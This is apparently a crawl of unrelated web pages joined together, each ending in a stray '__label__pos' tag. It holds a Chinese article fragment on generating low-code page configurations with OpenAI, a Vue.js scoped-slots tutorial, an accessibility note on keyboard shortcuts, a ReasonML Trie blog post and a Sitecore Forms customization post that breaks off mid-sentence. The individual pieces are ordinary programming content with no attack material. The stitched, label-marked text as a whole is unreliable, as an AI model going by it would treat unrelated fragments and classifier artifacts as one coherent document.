messageConfig; // 需要遍历所有代码块 while (endIndex > -1) { try { messageConfig = message.substring(startIndex + 3, endIndex); if ( /** messageConfig正确性校验 */ ) { resolve(messageConfig); break; } } catch (e) { /* 本次失败 */ } startIndex = message.indexOf('```', endIndex + 3); if (message.substring(startIndex, startIndex + 4) === 'json') { startIndex += 4; } if (startIndex === -1) { reject(['OpenAI返回的信息不可识别:', message]); break; } endIndex = message.indexOf('```', startIndex + 3); } } else { // 返回消息可能为代码本身 try { const messageConfig = message; if ( /** messageConfig正确性校验 */ ) { resolve(messageConfig); } else { reject(['OpenAI返回的信息不可识别:', message]); } } catch (e) { reject(['OpenAI返回的信息不可识别:', message]); } } }) } 低代码渲染 import React, { useState, useEffect } from 'react' import { CCMS } from 'ccms-antd' import OpenAI from './OpenAI' export default function App () { const [ ready, setReady ] = useState(true) const [ schema, setSchema ] = useState({}) const handleOpenAI = (input) => { OpenAI(input, schema).then((nextSchema) => { setReady(false) setSchema(nextSchema) }) } useEffect(() => { setReady(true) }, [schema]) return ( <div style={{ width: '100vw', height: '100vh' }}> {ready && ( <CCMS config={pageSchema} /** ... */ /> )} <div style={{ position: 'fixed', right: 385, bottom: 20, zIndex: 9999 }}> <Popover placement="topRight" trigger="click" content={ <Form.Item label="使用OpenAI助力搭建页面:" labelCol={{ span: 24 }}> <Input.TextArea placeholder="请在这里输入内容,按下Shift+回车确认。" defaultValue={defaultPrompt} onPressEnter={(e) => { if (e.shiftKey) { handleOpenAI(e.currentTarget.value) } }} /> </Form.Item> } > <Button shape="circle" type="primary" icon={ /** OpenAI icon */ } /> </Popover> </div> </div> ) } 四、信息安全 根据OpenAI隐私政策说明,使用API方式进行数据访问时: 1. 除非明确的授权,OpenAI不会使用用户发送的数据进行学习和改进模型。 2. 用户发送的数据会被OpenAI保留30天,以用于监管和审查。(有限数量的授权OpenAI员工,以及负有保密和安全义务的专业第三方承包商,可以访问这些数据) 3. 用户上传的文件(包括微调模型是提交的训练数据),除非用户删除,否则会一直保留。 另外,OpenAI不提供模型的私有化部署(包括上述微调模型方式所生成的自定义模型),但可以通过联系销售团队购买私有容器。 文中所使用的训练数据、私有框架知识以及低代码框架均源自本团队开发并已开源的内容。用户使用相关服务时也会进行数据安全提示。 点赞 收藏 评论区 推荐文章 皕杰报表之UUID ​在我们用皕杰报表工具设计填报报表时,如何在新增行里自动增加id呢?能新增整数排序id吗?目前可以在新增行里自动增加id,但只能用uuid函数增加UUID编码,不能新增整数排序id。uuid函数说明:获取一个UUID,可以在填报表中用来创建数据ID语法:uuid()或uuid(sep)参数说明:sep布尔值,生成的uuid中是否包含分隔符'',缺省为 Wesley13 Wesley13 2年前 FLV文件格式 1.        FLV文件对齐方式FLV文件以大端对齐方式存放多字节整型。如存放数字无符号16位的数字300(0x012C),那么在FLV文件中存放的顺序是:|0x01|0x2C|。如果是无符号32位数字300(0x0000012C),那么在FLV文件中的存放顺序是:|0x00|0x00|0x00|0x01|0x2C。2.   Wesley13 Wesley13 2年前 mysql设置时区 mysql设置时区mysql\_query("SETtime\_zone'8:00'")ordie('时区设置失败,请联系管理员!');中国在东8区所以加8方法二:selectcount(user\_id)asdevice,CONVERT\_TZ(FROM\_UNIXTIME(reg\_time),'08:00','0 Stella981 Stella981 2年前 Django中Admin中的一些参数配置 设置在列表中显示的字段,id为django模型默认的主键list_display('id','name','sex','profession','email','qq','phone','status','create_time')设置在列表可编辑字段list_editable Wesley13 Wesley13 2年前 MySQL部分从库上面因为大量的临时表tmp_table造成慢查询 背景描述Time:20190124T00:08:14.70572408:00User@Host:@Id:Schema:sentrymetaLast_errno:0Killed:0Query_time:0.315758Lock_ 【GPT-4理论篇-1】GPT-4核心技术探秘 | 京东云技术团队 在本文中,我将结合GPT4的技术报告、GPT4相对于GPT3.5/ChatGPT的提升、GPT4和ChatGPT的对比、OpenAI的近期工作,大语言模型(LargeLanguageModel,LLM)模型的科研进展,多模态模型的科研进展等多方面的信息,深入分析GPT4的技术细节。 基于AIGC的京东购物助手的技术方案设想 | 京东云技术团队 随着AIGC的爆火,ChatGPT,GPT4的发布,我作为一个算法工作者,深感AI发展的迅猛。最近,OpenAI的插件和联网功能陆续向用户公开,我也在第一时间试用了这些最新的功能。在OpenAI的插件市场上,我被一个可以帮助分析食谱,并生成购物清单的功能所吸引。
__label__pos
0.984521
Skip to main content Home / Articles / Using Scoped Slots in Vue.js to Abstract Functionality Let’s start with a short introduction to Vue.js slots concept. Slots are useful when you want to inject content in a specific place of a component. Those specific places that you can define are called slots. For example, you want to create a wrapper component that is styled in a specific way but you want to be able to pass any content to be rendered inside that wrapper (it might be a string, a computed value, or even another component). There are three types of slots: • default / unnamed slots: used when you have a single slot in a component. We create them by adding <slot> in the template where we want to be able to inject our content. This <slot> tag will be replaced with any content passed to the component’s template. • named slots: used when you have multiple slots in a component and we want to inject different content in different places (slots). We create those by adding <slot> with a name attribute (e.g. <slot name="header"></slot>). Then when we render our component, we provide a slot content for each named slot by adding a slot attribute with the slot name. <base-layout> <template slot="header"> <h1>My awsome header</h1> </template> <template slot="footer"> <p>My awsome footer</p> </template> </base-layout> By doing that, the <slot> tags in the component will be replaced by content passed to the component. • scoped slot: used when you want a template inside a slot to access data from the child component that renders the slot content. This is particularly useful when you need freedom in creating custom templates that use the child component’s data properties. scoped slots diagram Real-World Example: Creating a Google Map Loader component Imagine a component that configures and prepares an external API to be used in another component, but is not tightly coupled with any specific template. Such a component could then be reused in multiple places rendering different templates but using the same base object with specific API. I’ve created a component (GoogleMapLoader.vue) that: 1. initializes the Google Maps API 2. creates google and map objects 3. exposes those objects to the parent component in which the GoogleMapLoader is used Below is an example of how this can be achieved. We will analyze the code piece-by-piece and see what is actually happening in the next section. Let’s first establish our GoogleMapLoader.vue template: <template> <div> <div class="google-map" data-google-map></div> <template v-if="Boolean(this.google) && Boolean(this.map)"> <slot :google="google" :map="map" /> </template> </div> </template> Now, our script needs to pass some props to the component which allows us to set the Google Maps API and Map object: import GoogleMapsApiLoader from "google-maps-api-loader"; export default { props: { mapConfig: Object, apiKey: String }, data() { return { google: null, map: null }; }, async mounted() { const googleMapApi = await GoogleMapsApiLoader({ apiKey: this.apiKey }); this.google = googleMapApi; this.initializeMap(); }, methods: { initializeMap() { const mapContainer = this.$el.querySelector("[data-google-map]"); this.map = new this.google.maps.Map(mapContainer, this.mapConfig); } } }; This is just part of a working example. You can dive in deeper this example. OK, now that we have our use case set up, let’s move onto breaking that code down to explore what it’s doing. 1. Create a component that initializes our map In the template, we create a container for the map which will be used to mount the Map object extracted from the Google Maps API. // GoogleMapLoader.vue <template> <div> <div class="google-map" data-google-map></div> </div> </template> Next up, our script needs to receive props from the parent component which will allow us to set the Google Map. Those props consist of: • mapConfig: Google Maps config object • apiKey: Our personal api key required by Google Maps // GoogleMapLoader.vue import GoogleMapsApiLoader from "google-maps-api-loader"; export default { props: { mapConfig: Object, apiKey: String }, Then, we set the initial values of google and map to null: data() { return { google: null, map: null }; }, On the mounted hook, we create an instance of googleMapApi and the map object from it. We also need to set the values of google and map to the created instances: async mounted() { const googleMapApi = await GoogleMapsApiLoader({ apiKey: this.apiKey }); this.google = googleMapApi; this.initializeMap(); }, methods: { initializeMap() { const mapContainer = this.$el.querySelector("[data-google-map]"); this.map = new this.google.maps.Map(mapContainer, this.mapConfig); } } }; So far, so good. With all that done, we could continue adding the other objects to the map (Markers, Polylines, etc.) and use it as an ordinary map component. But, we want to use our GoogleMapLoader component only as a loader that prepares the map — we don’t want to render anything on it. To achieve that, we need to allow the parent component that will use our GoogleMapLoader to access this.google and this.map that are set inside the GoogleMapLoader component. That’s where scoped slots really shine. Scoped slots allow us to expose the properties set in a child component to the parent component. It may sound like an inception, but bear with me one more minute as we break that down further. 2. Create component that uses our initializer component In the template, we render the GoogleMapLoader component and pass props that are required to initialize the map. // TravelMap.vue <template> <GoogleMapLoader :mapConfig="mapConfig" apiKey="yourApiKey" /> </template> Our script tag should look like this: import GoogleMapLoader from "./GoogleMapLoader"; import { mapSettings } from "@/constants/mapSettings"; export default { components: { GoogleMapLoader, }, computed: { mapConfig() { return { ...mapSettings, center: { lat: 0, lng: 0 } }; }, } }; Still no scoped slots, so let’s add one. 3. Expose google and map properties to the parent component by adding a scoped slot Finally, we can add a scoped slot that will do the job and allow us to access the child component props in the parent component. We do that by adding the <slot> tag in the child component and passing the props that we want to expose (using v-bind directive or :propName shorthand). It does not differ from passing the props down to the child component, but doing it in the <slot> tag will reverse the direction of data flow. // GoogleMapLoader.vue <template> <div> <div class="google-map" data-google-map></div> <template v-if="Boolean(this.google) && Boolean(this.map)"> <slot :google="google" :map="map" /> </template> </div> </template> Now, when we have the slot in the child component, we need to receive and consume the exposed props in the parent component. 4. Receive exposed props in the parent component using the slot-scope attribute To receive the props in the parent component, we declare a template element and use the slot-scope attribute. This attribute has access to the object carrying all the props exposed from the child component. We can grab the whole object or we can de-structure that object and only what we need. Let’s de-structure this thing to get what we need. // TravelMap.vue <template> <GoogleMapLoader :mapConfig="mapConfig" apiKey="yourApiKey" > <template slot-scope="{ google, map }"> {{ map }} {{ google }} </template> </GoogleMapLoader> </template> Even though the google and map props do not exist in the TravelMap scope, the component has access to them and we can use them in the template. Yeah, OK, but why would I do things like that? What is the use of all that? Glad you asked! Scoped slots allow us to pass a template to the slot instead of a rendered element. It’s called a scoped slot because it will have access to certain child component data even though the template is rendered in the parent component scope. That gives us a freedom to fill the template with custom content from the parent component. 5. Create factory components for Markers and Polylines Now, when we have our map ready, we will create two factory components that will be used to add elements to the TravelMap. // GoogleMapMarker.vue import { POINT_MARKER_ICON_CONFIG } from "@/constants/mapSettings"; export default { props: { google: { type: Object, required: true }, map: { type: Object, required: true }, marker: { type: Object, required: true } }, mounted() { new this.google.maps.Marker({ position: this.marker.position, marker: this.marker, map: this.map, icon: POINT_MARKER_ICON_CONFIG }); }, }; // GoogleMapLine.vue import { LINE_PATH_CONFIG } from "@/constants/mapSettings"; export default { props: { google: { type: Object, required: true }, map: { type: Object, required: true }, path: { type: Array, required: true } }, mounted() { new this.google.maps.Polyline({ path: this.path, map: this.map, ...LINE_PATH_CONFIG }); }, }; Both of these receive google that we use to extract the required object (Marker or Polyline) as well as map which gives as a reference to the map on which we want to place our element. Each component also expects an extra prop to create a corresponding element. In this case, we have marker and path, respectively. On the mounted hook, we create an element (Marker/Polyline) and attach it to our map by passing the map property to the object constructor. There’s still one more step to go... 6. Add elements to the map Let’s use our factory components to add elements to our map. We must render the factory component and pass the google and map objects so data flows to the right places. We also need to provide the data that’s required by the element itself. In our case, that’s the marker object with the position of the marker and the path object with Polyline coordinates. Here we go, integrating the data points directly into the template: // TravelMap.vue <template> <GoogleMapLoader :mapConfig="mapConfig" apiKey="yourApiKey" > <template slot-scope="{ google, map }"> <GoogleMapMarker v-for="marker in markers" :key="marker.id" :marker="marker" :google="google" :map="map" /> <GoogleMapLine v-for="line in lines" :key="line.id" :path.sync="line.path" :google="google" :map="map" /> </template> </GoogleMapLoader> </template> We need to import the required factory components in our script and set the data that will be passed to the markers and lines: import { mapSettings } from "@/constants/mapSettings"; export default { components: { GoogleMapLoader, GoogleMapMarker, GoogleMapLine }, data() { return { markers: [ { id: "a", position: { lat: 3, lng: 101 } }, { id: "b", position: { lat: 5, lng: 99 } }, { id: "c", position: { lat: 6, lng: 97 } } ], lines: [ { id: "1", path: [{ lat: 3, lng: 101 }, { lat: 5, lng: 99 }] }, { id: "2", path: [{ lat: 5, lng: 99 }, { lat: 6, lng: 97 }] } ] }; }, computed: { mapConfig() { return { ...mapSettings, center: this.mapCenter }; }, mapCenter() { return this.markers[1].position; } } }; And we’re done! With all those bits and pieces completed, we can now re-use the GoogleMapLoader component as a base for all our maps by passing different templates to each one of them. Imagine that you need to create another map with different Markers or just Markers without Polylines. By using a pattern of scoped slots, it becomes very easy since all we need to pass now is different content to the GoogleMapLoader component. This pattern is not strictly connected to Google Maps; it can be used with any library to set the base component and expose the library’s API that might then be used in the component that summoned the base component. It might be tempting to create a more complex or robust solution, but this gets us the abstraction we need and it becomes an independent piece of our codebase. If we get to that point, then it might be worth considering extraction to an add-on.
__label__pos
0.981373
✎ Technique: Character key shortcuts If keyboard shortcuts are implemented using only a letter (including upper- and lower-case letters), punctuation, number, or symbol characters, provide a way to turn off or remap character key shortcuts: • Turn off: A mechanism is available to turn the shortcut off; • Remap: A mechanism is available to remap the shortcut to use one or more non-printable keyboard characters (e.g. Ctrl, Alt, etc); • Active only on focus: The keyboard shortcut for a user interface component is only active when that component has focus. If you provide character key shortcuts, provide a way to turn them off and a way to remap them. When remapping, allow users to assign one or more characters to the shortcut. (Source: Knowbility article on character key shortcuts)
__label__pos
0.860919
Trieng out ReasonML and ReasonReact The title seems a little weird, looks like a typo, but there is a pun intended in here. The “Trie” in “Trieng“ stands for the Trie data-structure and in this blog post we’ll explore the world of ReasonML by taking an example of a Trie and implement a React app in ReasonReact. I wrote this post to serve as a good introduction to ReasonML and the Trie data structure that I have been playing around with the last couple of months. What is ReasonML? Reason or ReasonML is not a new language; it is a new syntax which is powered by OCaml (a battle-tested functional programming language from 1996) ecosystem. The ReasonML code that we write can be compiled to JavaScript which can be run in the Browser and Node.js using BuckleScript compiler. BuckleScript is used to compile ReasonML/OCaml code to JavaScript. Reason’s creator also created ReactJS, whose first prototypes were written in SML, a distant cousin of OCaml. What does this have to do with Functional Programming? Functional Programming is paradigm in programming in which the focus is on transforming data by applying functions. Functions can be thought of as computation that maps input of a particular type/structure to output of a different type/structure. Functional programming works on principles like Immutability, Scopes & Closures, Recursion, programming without side-effects. Side-Effect means when a function changes a value other than its input parameter. Example of side-effect is mutating the state of global variables from a function. Mutating data is a taboo in functional programming. Functional Programming Languages can be loosely classified into 2 family of languages 1. LISP family 2. ML family LISP family languages: LISP family languages are dynamically typed, the syntax of these languages contain a lot of parenthesis. The popular LISP dialects in use these days are Clojure, Common Lisp and Scheme. LISP uses a special kind of syntax called S-expressions and prefix notations. One of the good books to learn about LISP is the SICP (Structure and Interpretation of Computer Programs). ML family languages: ML family of languages are statically strongly/gradually typed, they make of Hindley-Milner type system. The H-M type system allows the compiler to make type inferences when types are not explicitly provided in the code. The ML family languages have some great features like pattern-matching, currying. Popular languages from the ML family are Haskell, OCaml, SML(Standard ML), F#. ReasonML belongs to the ML family of languages and also provides us a syntax to do imperative programming when we can’t think of a functional implementation (Yes, ReasonML allows mutations, for and while loops). What is a Data Structure ? A data structure can be thought of as an API which allows certain operations and guarantees some time and space complexity for these operations.For example a Set data structure can be implemented using a HashTable or a HashMap as long as we are able to guarantee uniqueness of values and find values in O(1) we are good to go. Trie is also called a prefix tree because we store prefixes in a tree like structure. Trie is a multi-way tree data-structure i.e. one node can have multiple children. Lets take an example of searching through a list of words/sentences (strings). This can be implemented naively using an array or a list, But for fast prefix lookup we can use Trie. NAIVE IMPLEMENTATIONTIME COMPLEXITYSPACE COMPLEXITY InsertO(1)O(n*m) n-number of strings m-length of string DeleteO(n*m) + O(n) NA find + delete from list NA FindO(n*m)NA Find All PrefixO(n*m) n – number of strings m – length of prefix NA TRIE IMPLEMENTATIONTIME COMPLEXITYSPACE COMPLEXITY InsertO(n)O(n*m) n-number of strings m-length of string DeleteO(m)NA FindO(m)NA Find All PrefixO(n) + O(m) n – number of strings m – length of prefix NA So, Trie is faster than a list implementation for this problem. Only downside is: Trie takes more space in memory as it stores data in the form of nodes, node takes up more memory than a character. Also strings are stored as a sequence of characters in adjacent memory locations, so they can take advantage of hardware cache while lookups for memory locations (In case of a Trie there is a high chance of cache miss while memory location lookups). Enough with the theory let’s get started with some code. I have implemented the Trie data-structure in ReasonML and used this data-structure to build a demo of filtering through a list of strings in ReasonReact (React library implemented in ReasonML). You can checkout the code here: https://github.com/melwyn95/Trie-ReasonML/blob/master/src/Trie.re You can play around with the demo here: https://melwyn95.github.io/Trie-ReasonML/ The Trie node and operations have the following signatures: Type Signatures for Trie Node and operations Type Signatures for Trie Node and operations ReasonML language features 1. ReasonML’s type system and compiler: ReasonML’s type system is complete and “sound”. The type coverage is always 100% Types can be inferred by the compiler. The type system deduces the types for you even if you don’t manually write them down. 1. Record types: You can define your own types in ReasonML like this type person = { age: int, name: string, }; Records in ReasonML are like JavaScript objects but are • Lighter • Immutable by default • Fixed in field names and types • Very fast • A bit more rigidly typed • Variant types: Variant Type Variant Type In functional programming there is a concept of polymorphic types which are known by many names like enums, sum types, algebraic data-types. This type allows us to define multiple specific constructors of a type, in the above example the type action has 3 constructors – these are used to define operations taking place on the front-end. When the page is initialised we dispatch an action of type Init. when we search something in the list the action type Search is dispatched. When we want to add something to the trie we dispatch Add. For more about variant types refer: https://reasonml.github.io/docs/en/variant 1. Destructuring and Pattern Matching: Destructuring is a syntax through which we can extract fields from a data-structure without using the dot operator. It is a visually concise way of extracting fields. Example: type person = { name: string, age: int }; let somePerson = { name: 'Guy', age: 30 }; let { name, age } = somePerson; Pattern Matching Pattern Matching Pattern Matching is like destructuring but it works with variant types. It is used with the switch expression, It forces you to handle all the cases for a variant type. In the example above the findPrefixRoot function returns a option type of node, if the prefix is found in the trie it return Some(node) else it return None Option type is special variant type provided in the ReasonML standard library it has type definition type option(‘a) = Some(‘a) | None; Here ‘a is like a generic, it is replaced by the type we specify. So, In the example above we have to handle both the cases for the option type returned by the findPrefixRoot function. If None is returned means there is no node in the Trie that matches the specified prefix, so we return an empty list ([]). If Some(prefixRoot) is returned we need to find all the words starting from the prefix root. 1. Currying and Partial Applications of functions: Currying is nice feature that functional languages provide, in simple words currying is, unless a function is provided with all the arguments needed by the function, the function is not executed, but it returns intermediate functions to which we can pass additional parameters/argument. All the functions in ReasonML are auto curried. And the process of creating intermediate functions from a curried function is called partial application. Example: let add = (x, y) => x + y; let addFive = add(5); let eleven = addFive(6); let twelve = addFive(7); Here add is a function which is auto curried, and we create a new function called addFive by partially applying 5 as a parameter to add. Then when we call addFive with parameters 6 & 7 we get 11 & 12 respectively. Internally add is represented as: let add = x => y => x + y; 1. Mutation in ReasonML: Mutation is generally discouraged in functional programming but sometimes it is helpful to optimize the performance. ReasonML provides us mutative programming capabilities through ref() Mutation using ref() Mutation using ref() let bindings are immutable, but you can wrap it with a ref, which is like a box whose content can change. In the above example I have wrapped list in a ref, to mutate the value of list we have to use := operator, and to access the value inside the ref, we use ^ operator. The listAllWords function could have been written in a functional way, but I wrote it using mutation just to explore the concept. Bonus: Making API call in Reason-React API call using Fetch API call using Fetch For working with API calls and JSON we need to use BuckleScript libraries like bs-fetch and bs-json. I used references from stack overflow and ReasonML forums to make the above code work, and I don’t completely understand how the above code works, but it works. It also reminds me that I’m not done learning ReasonML, there is lots of stuff that is to be learnt and understood. I hope this blog-post inspires you to learn ReasonML and ReasonReact. If you have made it this far, thanks for reading and !!!Happy Hacking!!! References / Resources: 1. You can start by watching this video – it is 5 ½ hours long, but it will cover all the basic stuff in order to get started with ReasonML 2. The Official Documentation of ReasonML is really helpful when dealing with modules, Functors and Promises. 3. For ReasonReact refer the official site. It has the commands in order to get started with a demo project, the demo project has nice examples to get started. 4. Finally, one last resource Online Book on ReasonML by Dr. Axel Rauschmayer, It covers all the basic concepts and touches upon some advanced concepts.
__label__pos
0.954538
Home » Configuration » Configuration Factory Category Archives: Configuration Factory Allow Text for Empty List Items from Dynamic Datasources in Sitecore Experience Forms Last week, when building a form on Sitecore Experience Forms, I noticed an issue where you cannot associate text with an empty list option for List fields. For example, suppose you have a Dropdown List field where you want to put “Please select blah blah blah”, you cannot do this as you cannot associate text with Empty List value options using the “out of the box” (OOTB) feature to add an empty list option, nor can you have an empty Value field on an Item when using a Dynamic datasource. Let me create a dummy form to illustrate the issue (no, I’m not calling you a dummy 😉 ). Let’s have fun with donuts! Suppose we have the following donut items in a folder somewhere which will be used as list options in a Dropdown List field in Forms: We also have one which will serve as the top option telling the user to choose a donut: Well, OOTB, this Item with an empty value field will not be an option in my field: Sure, you might say “Hey Mike, you can associate empty options in these fields by setting the ‘Empty list item at top of list’ property setting in Forms.” Yes, you can do that but you cannot associate text with that empty option: ¡Esta no bueno! Well, after some digging, I discovered the service Sitecore.ExperienceForms.Mvc.DataSource.IListDataSourceProvider in Sitecore.ExperienceForms.Mvc.dll which seemed like a good place to look (I’ve mentioned before that virtually everything on Sitecore Experience Forms is in the Sitecore IoC so you should have a look at /sitecore/admin/showservicesconfig.aspx when looking to customize it). When I looked at this interface’s implementation, Sitecore.ExperienceForms.Mvc.DataSource.ListDataSourceProvider, I noticed ListFieldItem — a POCO which represents options for List Fields on Forms — are only added when their Value properties aren’t null or empty, so I decided to customize this to allow for those which have empty Value properties but not empty Text properties. The following solution does just that. I first created the following POCO class to contain any hardcoded string values I saw in the OOTB service (please don’t hardcode things as you won’t be invited to parties if you do so 😉 ). An instance of this class will be hydrated from values housed in a Sitecore configuration file further down in this post: namespace Sandbox.Foundation.Form.Models.Mvc.Datasource { public class ListDataSourceProviderSettings { public string ListDelimiters { get; set; } } } I then created the following configurator to hydrate the POCO instance above from the Sitecore configuration file further down. I ultimately stick this instance into the Sitecore IoC as a singleton so I can inject it into any service classes that need it: using System; using Microsoft.Extensions.DependencyInjection; using Sitecore.Abstractions; using Sitecore.DependencyInjection; namespace Sandbox.Foundation.Form { public class ListDataSourceFieldsConfigurator : IServicesConfigurator { public void Configure(IServiceCollection serviceCollection) { serviceCollection.AddSingleton(CreateListDataSourceProviderSettings); } private ListDataSourceProviderSettings CreateListDataSourceProviderSettings(IServiceProvider provider) => CreateConfigObject<ListDataSourceProviderSettings>(provider, "moduleSettings/foundation/form/listDataSourceProviderSettings"); private TConfigObject CreateConfigObject<TConfigObject>(IServiceProvider provider, string path) where TConfigObject : class => GetService<BaseFactory>(provider).CreateObject(path, true) as TConfigObject; private TService GetService<TService>(IServiceProvider provider) => provider.GetService<TService>(); } } Next, I created the following class to replace the OOTB one: using System.Collections.Generic; using System.Linq; using Sitecore.Data.Items; using Sitecore.ExperienceForms.Mvc.DataSource; using Sitecore.ExperienceForms.Mvc.Models; using Sitecore.ExperienceForms.Mvc.Pipelines; using Sandbox.Foundation.Form.Models.Mvc.Datasource; namespace Sandbox.Foundation.Form.Services.Mvc.Datasource { public class AllowEmptyValuesListDataSourceProvider : ListDataSourceProvider { private readonly ListDataSourceProviderSettings _settings; private readonly IFormBuilderContext _formBuilderContext; private readonly IListItemParser _listItemParser; public AllowEmptyValuesListDataSourceProvider(ListDataSourceProviderSettings settings, IFormBuilderContext formBuilderContext, IListItemParser listItemParser) : base(formBuilderContext, listItemParser) { _settings = settings; _listItemParser = listItemParser; } public override IEnumerable<ListFieldItem> GetListItems(string dataSource, string displayFieldName, string valueFieldName, string defaultSelection) { IEnumerable<Item> items = GetDataItems(dataSource); if(items == null || !items.Any()) { return CreateEmptyListFieldItemCollection(); } IList<ListFieldItem> options = CreateNewListFieldItemList(); if(options == null) { return CreateEmptyListFieldItemCollection(); } IEnumerable<string> itemsToSelect = GetItemsToSelect(defaultSelection); foreach (Item item in items) { ListFieldItem listFieldItem = ParseListFieldItem(item, displayFieldName, valueFieldName); if (listFieldItem == null || string.IsNullOrWhiteSpace(listFieldItem.Text)) { continue; } SetSelected(itemsToSelect, listFieldItem); options.Add(listFieldItem); } return options; } protected virtual IEnumerable<ListFieldItem> CreateEmptyListFieldItemCollection() => CreateEmptyCollection<ListFieldItem>(); protected virtual IList<ListFieldItem> CreateNewListFieldItemList() => CreateNewList<ListFieldItem>(); protected virtual IList<TObject> CreateNewList<TObject>() => new List<TObject>(); protected virtual IEnumerable<string> GetItemsToSelect(string itemsToSelect) { char[] delimiters = GetListDelimiters(); if (string.IsNullOrWhiteSpace(itemsToSelect) || !HasAny(delimiters)) { return CreateEmptyCollection<string>(); } return itemsToSelect.Split(delimiters); } protected virtual char[] GetListDelimiters() { if (string.IsNullOrWhiteSpace(_settings.ListDelimiters)) { return CreateEmptyCollection<char>().ToArray(); } return _settings.ListDelimiters.ToCharArray(); } protected virtual IEnumerable<TObject> CreateEmptyCollection<TObject>() => Enumerable.Empty<TObject>(); protected virtual ListFieldItem ParseListFieldItem(Item item, string displayFieldName, string valueFieldName) => _listItemParser.Parse(item, displayFieldName, valueFieldName); protected virtual void SetSelected(IEnumerable<string> itemsToSelect, ListFieldItem listFieldItem) { if(!HasAny(itemsToSelect) || string.IsNullOrWhiteSpace(listFieldItem?.ItemId)) { return; } listFieldItem.Selected = ShouldSelect(itemsToSelect, listFieldItem); } protected virtual bool ShouldSelect(IEnumerable<string> itemsToSelect, ListFieldItem listFieldItem) => ContainsValue(itemsToSelect, listFieldItem?.ItemId); protected virtual bool ContainsValue(IEnumerable<string> items, string value) => HasAny(items) && !string.IsNullOrWhiteSpace(value) && items.Contains(value); protected virtual bool HasAny<TObject>(IEnumerable<TObject> collection) => collection != null && collection.Any(); } } I’m not going to go much into how this class works as I think you should read it over a few times to discover for yourself on how it works. Ultimately, it will add ListFieldItem instances with empty Value properties but not those with empty Text properties. I then tied it all together using the following Sitecore configuration file: <?xml version="1.0"?> <configuration xmlns:patch="http://www.sitecore.net/xmlconfig/" xmlns:env="http://www.sitecore.net/xmlconfig/env"> <sitecore> <moduleSettings> <foundation> <form> <listDataSourceProviderSettings type="Sandbox.Foundation.Form.Models.Mvc.Datasource.ListDataSourceProviderSettings, Sandbox.Foundation.Form" singleInstance="true"> <ListDelimiters>|</ListDelimiters> </listDataSourceProviderSettings> </form> </foundation> </moduleSettings> <services> <configurator type="Sandbox.Foundation.Form.ListDataSourceFieldsConfigurator, Sandbox.Foundation.Form"/> <register serviceType="Sitecore.ExperienceForms.Mvc.DataSource.IListDataSourceProvider, Sitecore.ExperienceForms.Mvc"> <patch:attribute name="implementationType">Sandbox.Foundation.Form.Services.Mvc.Datasource.AllowEmptyValuesListDataSourceProvider, Sandbox.Foundation.Form</patch:attribute> </register> </services> </sitecore> </configuration> One thing to note is I’m replacing the OOTB service with my custom one above under /services/register[@serviceType=’Sitecore.ExperienceForms.Mvc.DataSource.IListDataSourceProvider, Sitecore.ExperienceForms.Mvc’] After doing a build and deploy of my solution locally, I reloaded the Forms Builder/designer page. As you can see my empty valued option with text now displays: Yep, it was fixed. Yes, you can have your donut and eat it too. 😉 Until next time, keep on Sitecoring. Oh, and Happy Holidays as well! Service Locate or Create Objects Defined in a Fully Qualified Type Name Field in Sitecore <TL;DR> This is — without a doubt — the longest blog post I have ever written — and hopefully to ever write as it nearly destroyed me 😉 — so will distill the main points in this TL;DR synopsis. Most bits in Sitecore Experience Forms use objects/service class instances sourced from the Sitecore IoC container but not all. Things not sourced from the Sitecore IoC container are defined on Items in the following folders: . Why? ¯\_(ツ)_/¯ This is most likely due to their fully qualified type names being defined in a type field on Items contained in these folders, and sourcing these from the Sitecore IoC is not a thing OOTB in Sitecore as far as I am aware (reflection is used to create them): Moreover, this is the same paradigm found in Web Forms for Marketers (WFFM) for some of its parts (Save Actions are an example). Well, this paradigm bothers me a lot — I strongly feel that virtually everything should be sourced from the Sitecore IoC container as it promotes SOLID principles, a discussion I will leave for another time — so went ahead and built a system of Sitecore pipelines and service classes to: 1. Get the fully qualified type name string out of a field of an Item. 2. Resolve the Type from the string from #1. 3. Try to find the Type in the Sitecore IoC container using Service Locator (before whinging about using Service Locator for this, keep in mind that it would be impossible to inject everything from the IoC container into a class instance’s constructor in order to find it). If found, return to the caller. Otherwise, proceed to #4. 4. Create an instance of the Type using Reflection. Return the result to the caller. Most of the code in the solution that follows are classes which serve as custom pipeline processors for 5 custom pipelines. Pipelines in Sitecore — each being an embodiment of the chain-of-responsibility pattern — are extremely flexible and extendable, hence the reason for going with this approach. I plan on putting this solution up on GitHub in coming days (or weeks depending on timing) so it is more easily digestible than in a blost post. For now, Just have a scan of the code below. Note: This solution is just a Proof of concept (PoC). I have not rigorously tested this solution; have no idea what its performance is nor the performance impact it may have; and definitely will not be held responsible if something goes wrong if you decided to use this code in any of your solutions. Use at your own risk! </TL;DR> Now that we have that out of the way, let’s jump right into it. I first created the following abstract class to serve as the base for all pipeline processors in this solution: using Sitecore.Pipelines; namespace Sandbox.Foundation.ObjectResolution.Pipelines { public abstract class ResolveProcessor<TPipelineArgs> where TPipelineArgs : PipelineArgs { public void Process(TPipelineArgs args) { if (!CanProcess(args)) { return; } Execute(args); } protected virtual bool CanProcess(TPipelineArgs args) => args != null; protected virtual void AbortPipeline(TPipelineArgs args) => args?.AbortPipeline(); protected virtual void Execute(TPipelineArgs args) { } } } The Execute() method on all pipeline processors will only run when the processor’s CanProcess() method returns true. Also, pipeline processors have the ability to abort the pipeline where they are called. I then created the following abstract class for all service classes which call a pipeline to “resolve” a particular thing: using Sitecore.Abstractions; using Sitecore.Pipelines; namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers { public abstract class PipelineObjectResolver<TArguments, TPipelineArguemnts, TResult> where TPipelineArguemnts : PipelineArgs { private readonly BaseCorePipelineManager _corePipelineManager; protected PipelineObjectResolver(BaseCorePipelineManager corePipelineManager) { _corePipelineManager = corePipelineManager; } public TResult Resolve(TArguments arguments) { TPipelineArguemnts args = CreatePipelineArgs(arguments); RunPipeline(GetPipelineName(), args); return GetObject(args); } protected abstract TResult GetObject(TPipelineArguemnts args); protected abstract TPipelineArguemnts CreatePipelineArgs(TArguments arguments); protected abstract string GetPipelineName(); protected virtual void RunPipeline(string pipelineName, PipelineArgs args) => _corePipelineManager.Run(pipelineName, args); } } Each service class will “resolve” a particular thing with arguments passed to their Resolve() method — these service class’ Resolve() method will take in a TArguments type which serves as the input arguments for it. They will then delegate to a pipeline via the RunPipeline() method to do the resolving. Each will also parse the results returned by the pipeline via the GetObject() method. Moving forward in this post, I will group each resolving pipeline with their service classes under a <pipeline name /> section. <resolveItem /> I then moved on to creating a 